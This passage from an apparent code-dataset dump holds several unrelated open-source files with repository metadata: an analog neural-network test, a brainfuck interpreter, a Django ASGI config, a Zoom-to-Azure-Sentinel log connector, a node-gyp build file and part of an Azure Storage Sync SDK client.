pred = model(x_b)
loss = loss_func(pred, y_b)
loss.backward()
opt.step()
@staticmethod
def get_torch_model(use_cuda: bool):
""" Returns a torch model."""
manual_seed(4321)
torch_model = Sequential(
torch_linear(4, 3),
torch_linear(3, 3),
Sequential(
torch_linear(3, 1),
torch_linear(1, 1)
)
)
if use_cuda:
torch_model.cuda()
return torch_model
def test_load_state_dict_conversion(self):
"""Test loading and setting conversion with alpha."""
# Create the device and the array.
x_b = Tensor([[0.1, 0.2, 0.3, 0.4], [0.2, 0.4, 0.3, 0.1]])
y_b = Tensor([[0.3], [0.6]])
if self.use_cuda:
x_b = x_b.cuda()
y_b = y_b.cuda()
model = self.get_torch_model(self.use_cuda)
self.train_model_torch(model, mse_loss, x_b, y_b)
analog_model = convert_to_analog(model, self.get_rpu_config(), weight_scaling_omega=1.0)
analog_loss = mse_loss(analog_model(x_b), y_b)
with TemporaryFile() as file:
save(analog_model.state_dict(), file)
# Load the model.
file.seek(0)
model = self.get_torch_model(self.use_cuda)
new_analog_model = convert_to_analog(model, self.get_rpu_config(),
weight_scaling_omega=1.0)
state_dict = load(file)
new_analog_model.load_state_dict(state_dict, load_rpu_config=True)
new_state_dict = new_analog_model.state_dict()
for key in new_state_dict.keys():
if not key.endswith('analog_tile_state'):
continue
state1 = new_state_dict[key]
state2 = state_dict[key]
assert_array_almost_equal(state1['analog_tile_weights'],
state2['analog_tile_weights'])
assert_array_almost_equal(state1['analog_alpha_scale'],
state2['analog_alpha_scale'])
new_analog_loss = mse_loss(new_analog_model(x_b), y_b)
self.assertTensorAlmostEqual(new_analog_loss, analog_loss)
| 39.20398
| 96
| 0.669712
|
58bb506593c3ae35a98974a457423ccd5ad968e8
| 3,432
|
py
|
Python
|
main.py
|
loadedice/brainfuck
|
2d069ed54deb5fcae317ff0797568206a050f71f
|
[
"MIT"
] | 1
|
2017-03-17T17:14:35.000Z
|
2017-03-17T17:14:35.000Z
|
main.py
|
loadedice/brainfuck
|
2d069ed54deb5fcae317ff0797568206a050f71f
|
[
"MIT"
] | null | null | null |
main.py
|
loadedice/brainfuck
|
2d069ed54deb5fcae317ff0797568206a050f71f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from sys import stderr, stdin, argv
from ctypes import c_ubyte
def bf_parse(program, strict=False):
"""
Takes a brainfuck string, if strict == True checks that it's all valid brainfuck
returns a dictionary to help deal with jumping around in the program
I had other ideas about how to do this, but this was the easiest to do
and I think it's kinda nice but also not very efficient in terms of memory usage
If you can't tell I'm just playing by ear here and things are probably not very good.
"""
stack = []
jump_dict = {}
for position, symbol in enumerate(program):
if symbol == '[':
stack.append(position)
elif symbol == ']':
if len(stack) == 0:
                raise SyntaxError("`]` at character {p} does not have a corresponding `[`".format(p=position))
destination = stack.pop()
# Because we may need to jump back up to the '[' to check the condition to see if we need to jump out
# This could probably be done with a stack in the bf_eval function. Oh well.
jump_dict[position] = destination
jump_dict[destination] = position
elif strict and symbol not in "><+-.,":
raise SyntaxError("`{s}` at character {p} is not a valid brainfuck symbol".format(s=symbol, p=position))
if len(stack) != 0:
raise SyntaxError("Square brackets are not balanced")
return jump_dict
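# Illustrative comment (not part of the original program): for the program
# "[[]]" the call bf_parse("[[]]") returns {2: 1, 1: 2, 3: 0, 0: 3}, i.e. every
# '[' maps to its matching ']' and vice versa, so the evaluator can jump in
# either direction with a single dictionary lookup.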
def bf_eval(program, memory_size=30000):
"""
Takes brainfuck string and evaluates it.
each cell is fixed at being 8 bits
memory_size defines how many cells there are in memory
"""
jump_dict = bf_parse(program)
data = [c_ubyte(0) for _ in range(memory_size)] # Memory
data_pointer = 0 # index in the memory
program_counter = 0 # index in the program
while program_counter < len(program):
symbol = program[program_counter]
# Because Python lets you index arrays with negative indices...
if 0 > data_pointer or 0 > program_counter:
raise IndexError("Index out of bounds")
if symbol == '>':
data_pointer += 1
elif symbol == '<':
data_pointer -= 1
elif symbol == '+':
data[data_pointer].value += 1
elif symbol == '-':
data[data_pointer].value -= 1
elif symbol == '.':
print(chr(data[data_pointer].value), end='')
elif symbol == ',':
char = stdin.read(1)
# If we read an empty string then make it 0
if char == '':
char = '\0'
data[data_pointer] = c_ubyte(ord(char))
elif symbol == '[':
# If it is false then jump to the end.
# the program counter will be incremented after this block
if not data[data_pointer]:
program_counter = jump_dict[program_counter]
elif symbol == ']':
program_counter = jump_dict[program_counter]
continue
program_counter += 1
print()
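# Worked example (illustrative comment only, not part of the original program):
# bf_eval("++++++++[>++++++++<-]>+.") sets cell 0 to 8, adds 8 to cell 1 on each
# of the 8 loop iterations (64), increments once more to 65 and prints
# chr(65) == 'A'.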
def main():
if len(argv) > 2:
print("Usage: {} [path to file]".format(argv[0]), file=stderr)
return
elif len(argv) == 2:
with open(argv[1], 'r') as f:
program = f.read().strip()
else:
program = input("Enter the brainfuck program: ")
bf_eval(program)
if __name__ == '__main__':
main()
| 33.980198
| 116
| 0.593823
|
862b07a91d738f63686acb639bcf957e6e778b47
| 381
|
py
|
Python
|
ML/ML/asgi.py
|
Nagababu91768/house-price-prediction-ml-app
|
5a7a1e3b6306359f96ed1d9ff7f6ed558d9d3926
|
[
"MIT"
] | null | null | null |
ML/ML/asgi.py
|
Nagababu91768/house-price-prediction-ml-app
|
5a7a1e3b6306359f96ed1d9ff7f6ed558d9d3926
|
[
"MIT"
] | null | null | null |
ML/ML/asgi.py
|
Nagababu91768/house-price-prediction-ml-app
|
5a7a1e3b6306359f96ed1d9ff7f6ed558d9d3926
|
[
"MIT"
] | null | null | null |
"""
ASGI config for ML project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ML.settings')
application = get_asgi_application()
| 22.411765
| 78
| 0.779528
|
2c1d1e59ae4fde16cf4f162fca6b47280bd15e85
| 9,350
|
py
|
Python
|
DataConnectors/ZoomReports/ZoomSentinelConnector/__init__.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 2,227
|
2019-02-25T09:34:46.000Z
|
2022-03-31T21:30:59.000Z
|
DataConnectors/ZoomReports/ZoomSentinelConnector/__init__.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 1,728
|
2019-02-25T17:18:16.000Z
|
2022-03-31T23:49:18.000Z
|
DataConnectors/ZoomReports/ZoomSentinelConnector/__init__.py
|
johnbilliris/Azure-Sentinel
|
ef3c2e3919023e80e15a94544e06e37623e7c1d3
|
[
"MIT"
] | 1,624
|
2019-02-28T16:17:38.000Z
|
2022-03-31T18:00:02.000Z
|
import azure.functions as func
import jwt
import datetime
import json
import base64
import hashlib
import hmac
import requests
import re
import os
import logging
from .state_manager import StateManager
jwt_api_key = os.environ['ZoomApiKey']
jwt_api_secret = os.environ['ZoomApiSecret']
customer_id = os.environ['WorkspaceID']
shared_key = os.environ['WorkspaceKey']
connection_string = os.environ['AzureWebJobsStorage']
logAnalyticsUri = os.environ.get('logAnalyticsUri')
table_name = "Zoom"
chunksize = 10000
if ((logAnalyticsUri in (None, '') or str(logAnalyticsUri).isspace())):
logAnalyticsUri = 'https://' + customer_id + '.ods.opinsights.azure.com'
pattern = r'https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$'
match = re.match(pattern,str(logAnalyticsUri))
if(not match):
raise Exception("Zoom: Invalid Log Analytics Uri.")
class Zoom:
def __init__(self):
self.api_key = jwt_api_key
self.api_secret = jwt_api_secret
self.base_url = "https://api.zoom.us/v2"
self.jwt_token_exp_hours = 1
self.jwt_token = self.generate_jwt_token()
self.from_day,self.to_day = self.generate_date()
self.headers = {
'Accept': 'application/json',
'authorization': "Bearer " + self.jwt_token,
}
def generate_jwt_token(self):
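        # The token is signed with the account's API secret (PyJWT defaults to
        # HS256) and carries the two claims Zoom's JWT-app authentication
        # expects: 'iss' set to the API key and a short 'exp' expiry.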
payload = {
'iss': self.api_key,
'exp': datetime.datetime.now() + datetime.timedelta(hours=self.jwt_token_exp_hours)
}
jwt_token = jwt.encode(payload, self.api_secret)
return jwt_token
def generate_date(self):
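        # Determines the reporting window: the start date is the checkpoint
        # persisted by StateManager on the previous run (or 7 days back on the
        # first run); the current UTC date is stored as the next checkpoint and
        # returned as the end of the window.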
current_time_day = datetime.datetime.utcnow().replace(second=0, microsecond=0)
state = StateManager(connection_string)
past_time = state.get()
if past_time is not None:
logging.info("The last time point is: {}".format(past_time))
else:
logging.info("There is no last time point, trying to get events for last week.")
past_time = (current_time_day - datetime.timedelta(days=7)).strftime("%Y-%m-%d")
state.post(current_time_day.strftime("%Y-%m-%d"))
return (past_time, current_time_day.strftime("%Y-%m-%d"))
def get_report(self, report_type_suffix,next_page_token = None):
query_params = {
"page_size": 300,
"from": self.from_day,
"to": self.to_day
}
if next_page_token:
query_params.update({"next_page_token": next_page_token})
try:
r = requests.get(url = self.base_url + report_type_suffix,
params = query_params,
headers = self.headers)
if r.status_code == 200:
return r.json()
elif r.status_code == 400:
logging.error("The requested report cannot be generated for this account because"
" this account has not subscribed to toll-free audio conference plan."
" Error code: {}".format(r.status_code))
elif r.status_code == 401:
logging.error("Invalid access token. Error code: {}".format(r.status_code))
            elif r.status_code == 300:
                logging.error("Reports can only be provided for the most recent 6 months."
                              " Error code: {}".format(r.status_code))
            else:
                logging.error("Something went wrong. Error code: {}".format(r.status_code))
        except Exception as err:
            logging.error("Something went wrong. Exception error text: {}".format(err))
class Sentinel:
def __init__(self):
self.logAnalyticsUri = logAnalyticsUri
self.success_processed = 0
self.fail_processed = 0
self.table_name = table_name
self.chunksize = chunksize
def gen_chunks_to_object(self, data, chunksize=100):
chunk = []
for index, line in enumerate(data):
if (index % chunksize == 0 and index > 0):
yield chunk
del chunk[:]
chunk.append(line)
yield chunk
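    # Illustrative note (not in the original source): with chunksize=2,
    # gen_chunks_to_object([a, b, c, d, e]) yields [a, b], then [c, d], then [e].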
def gen_chunks(self, data):
for chunk in self.gen_chunks_to_object(data, chunksize=self.chunksize):
obj_array = []
for row in chunk:
if row != None and row != '':
obj_array.append(row)
body = json.dumps(obj_array)
self.post_data(body, len(obj_array))
def build_signature(self, date, content_length, method, content_type, resource):
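        # Builds the 'SharedKey <workspaceId>:<hash>' Authorization header used by
        # the Log Analytics HTTP Data Collector API: the string-to-sign is
        # "METHOD\ncontent-length\ncontent-type\nx-ms-date:<date>\n<resource>",
        # signed with HMAC-SHA256 using the base64-decoded workspace key and then
        # base64-encoded.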
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(
hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def post_data(self, body, chunk_count):
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self.build_signature(rfc1123date, content_length, method, content_type,
resource)
uri = self.logAnalyticsUri + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': self.table_name,
'x-ms-date': rfc1123date
}
response = requests.post(uri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
logging.info("Chunk was processed({} events)".format(chunk_count))
self.success_processed = self.success_processed + chunk_count
else:
logging.error("Error during sending events to Azure Sentinel. Response code:{}".format(response.status_code))
self.fail_processed = self.fail_processed + chunk_count
def results_array_join(result_element,api_req_id,api_req_name):
for element in result_element[api_req_id]:
element['event_type'] = api_req_id
element['event_name'] = api_req_name
results_array.append(element)
def get_main_info():
for api_req_id, api_req_info in reports_api_requests_dict.items():
api_req = api_req_info['api_req']
api_req_name = api_req_info['name']
logging.info("Getting report: {}".format(api_req_info['name']))
result = zoom.get_report(report_type_suffix = api_req)
if result is not None:
next_page_token = result.get('next_page_token')
results_array_join(result,api_req_id,api_req_name)
else:
next_page_token = None
while next_page_token:
result = zoom.get_report(report_type_suffix=api_req, next_page_token = next_page_token)
if result is not None:
next_page_token = result.get('next_page_token')
results_array_join(result, api_req_id, api_req_name)
else:
next_page_token = None
def main(mytimer: func.TimerRequest) -> None:
utc_timestamp = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Python timer trigger function ran at %s', utc_timestamp)
logging.info('Starting program')
global results_array, reports_api_requests_dict, zoom
reports_api_requests_dict = \
{
"dates": {"api_req": "/report/daily", "name": "Daily Usage Reports."},
"users": {"api_req": "/report/users", "name": "Active/Inactive Host Reports."},
"telephony_usage": {"api_req": "/report/telephone", "name": "Telephone Reports."},
"cloud_recording_storage": {"api_req": "/report/cloud_recording", "name": "Cloud Recording Usage Reports."},
"operation_logs": {"api_req": "/report/operationlogs", "name": "Operation Logs Report."},
"activity_logs": {"api_req": "/report/activities", "name": "Sign In/Sign Out Activity Report."}
}
results_array = []
zoom = Zoom()
sentinel = Sentinel()
zoom_class_vars = vars(zoom)
from_day, to_day = zoom_class_vars['from_day'], zoom_class_vars['to_day']
logging.info('Trying to get events for period: {} - {}'.format(from_day, to_day))
get_main_info()
sentinel.gen_chunks(results_array)
sentinel_class_vars = vars(sentinel)
success_processed, fail_processed = sentinel_class_vars["success_processed"],\
sentinel_class_vars["fail_processed"]
logging.info('Total events processed successfully: {}, failed: {}. Period: {} - {}'
.format(success_processed, fail_processed, from_day, to_day))
| 44.52381
| 122
| 0.607059
|
d565b0605e7c547850eea95409bf1708c77d968c
| 858
|
gyp
|
Python
|
lib/mac/binding.gyp
|
abiatarnt/noble
|
d9c4748e3d2220c807e33a624b2b719c8d76228d
|
[
"MIT"
] | 2
|
2021-09-24T13:51:09.000Z
|
2021-09-24T14:08:36.000Z
|
lib/mac/binding.gyp
|
stoprocent/noble
|
ff82ecd83978d8be155ce00e36e72fd6f91ca882
|
[
"MIT"
] | 1
|
2021-09-28T09:08:15.000Z
|
2021-09-28T09:08:15.000Z
|
lib/mac/binding.gyp
|
stoprocent/noble
|
ff82ecd83978d8be155ce00e36e72fd6f91ca882
|
[
"MIT"
] | 1
|
2021-09-24T14:05:29.000Z
|
2021-09-24T14:05:29.000Z
|
{
'targets': [
{
'target_name': 'binding',
'sources': [ 'src/noble_mac.mm', 'src/napi_objc.mm', 'src/ble_manager.mm', 'src/objc_cpp.mm', 'src/callbacks.cc' ],
'include_dirs': ["<!@(node -p \"require('node-addon-api').include\")"],
'dependencies': ["<!(node -p \"require('node-addon-api').gyp\")"],
'cflags!': [ '-fno-exceptions' ],
'cflags_cc!': [ '-fno-exceptions' ],
'xcode_settings': {
'GCC_ENABLE_CPP_EXCEPTIONS': 'YES',
'CLANG_CXX_LIBRARY': 'libc++',
'MACOSX_DEPLOYMENT_TARGET': '10.7',
'OTHER_CFLAGS': [
'-fobjc-arc',
],
},
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreBluetooth.framework',
]
},
'product_dir': '../lib/mac/native',
}
]
}
| 31.777778
| 123
| 0.504662
|
645f0d632772e7027a2bc622b80488e9356b74e0
| 32,198
|
py
|
Python
|
sdk/storage/azure-mgmt-storagesync/azure/mgmt/storagesync/aio/operations/_registered_servers_operations.py
|
mohamedshabanofficial/azure-sdk-for-python
|
81c585f310cd2ec23d2ad145173958914a075a58
|
[
"MIT"
] | 2
|
2021-03-24T06:26:11.000Z
|
2021-04-18T15:55:59.000Z
|
sdk/storage/azure-mgmt-storagesync/azure/mgmt/storagesync/aio/operations/_registered_servers_operations.py
|
mohamedshabanofficial/azure-sdk-for-python
|
81c585f310cd2ec23d2ad145173958914a075a58
|
[
"MIT"
] | 2
|
2021-11-03T06:10:36.000Z
|
2021-12-01T06:29:39.000Z
|
sdk/storage/azure-mgmt-storagesync/azure/mgmt/storagesync/aio/operations/_registered_servers_operations.py
|
mohamedshabanofficial/azure-sdk-for-python
|
81c585f310cd2ec23d2ad145173958914a075a58
|
[
"MIT"
] | 1
|
2021-05-19T02:55:10.000Z
|
2021-05-19T02:55:10.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RegisteredServersOperations:
"""RegisteredServersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storagesync.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_storage_sync_service(
self,
resource_group_name: str,
storage_sync_service_name: str,
**kwargs
) -> AsyncIterable["_models.RegisteredServerArray"]:
"""Get a given registered server list.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either RegisteredServerArray or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.storagesync.models.RegisteredServerArray]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RegisteredServerArray"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_storage_sync_service.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('RegisteredServerArray', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.StorageSyncError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_storage_sync_service.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers'} # type: ignore
async def get(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
**kwargs
) -> "_models.RegisteredServer":
"""Get a given registered server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:param server_id: GUID identifying the on-premises server.
:type server_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegisteredServer, or the result of cls(response)
:rtype: ~azure.mgmt.storagesync.models.RegisteredServer
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RegisteredServer"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageSyncError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
deserialized = self._deserialize('RegisteredServer', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def _create_initial(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
parameters: "_models.RegisteredServerCreateParameters",
**kwargs
) -> Optional["_models.RegisteredServer"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.RegisteredServer"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'RegisteredServerCreateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageSyncError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
deserialized = None
if response.status_code == 200:
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
deserialized = self._deserialize('RegisteredServer', pipeline_response)
if response.status_code == 202:
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_create_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def begin_create(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
parameters: "_models.RegisteredServerCreateParameters",
**kwargs
) -> AsyncLROPoller["_models.RegisteredServer"]:
"""Add a new registered server.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param storage_sync_service_name: Name of Storage Sync Service resource.
:type storage_sync_service_name: str
:param server_id: GUID identifying the on-premises server.
:type server_id: str
:param parameters: Body of Registered Server object.
:type parameters: ~azure.mgmt.storagesync.models.RegisteredServerCreateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RegisteredServer or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.storagesync.models.RegisteredServer]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RegisteredServer"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_initial(
resource_group_name=resource_group_name,
storage_sync_service_name=storage_sync_service_name,
server_id=server_id,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-correlation-request-id']=self._deserialize('str', response.headers.get('x-ms-correlation-request-id'))
deserialized = self._deserialize('RegisteredServer', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.StorageSync/storageSyncServices/{storageSyncServiceName}/registeredServers/{serverId}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
storage_sync_service_name: str,
server_id: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'storageSyncServiceName': self._serialize.url("storage_sync_service_name", storage_sync_service_name, 'str'),
'serverId': self._serialize.url("server_id", server_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
